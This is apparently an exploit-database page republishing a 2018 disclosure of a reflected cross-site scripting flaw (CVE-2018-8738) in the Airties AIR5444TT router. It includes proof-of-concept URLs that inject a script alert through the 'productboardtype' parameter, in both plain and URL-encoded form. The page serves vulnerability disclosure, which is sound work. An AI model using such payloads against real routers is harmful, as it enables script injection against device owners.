header-logo
Suggest Exploit
vendor:
AIR5444TT
by:
Raif Berkay Dincel

Airties AIR5444TT – Cross-Site Scripting

A vulnerability in Airties AIR5444TT could allow an unauthenticated attacker to inject malicious JavaScript code into the application. This vulnerability exists due to insufficient validation of user-supplied input in the 'page' and 'productboardtype' parameters of the 'top.html' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious JavaScript code to the vulnerable application. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the vulnerable application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
# Date: 2018-07-06 
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: airties.com 
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# CVE-ID: CVE-2018-8738
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
 
# Vulnerable Parameter Type: GET 
# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype= 
 
# Proof of Concepts:
 
192.168.2.1/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
 
http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E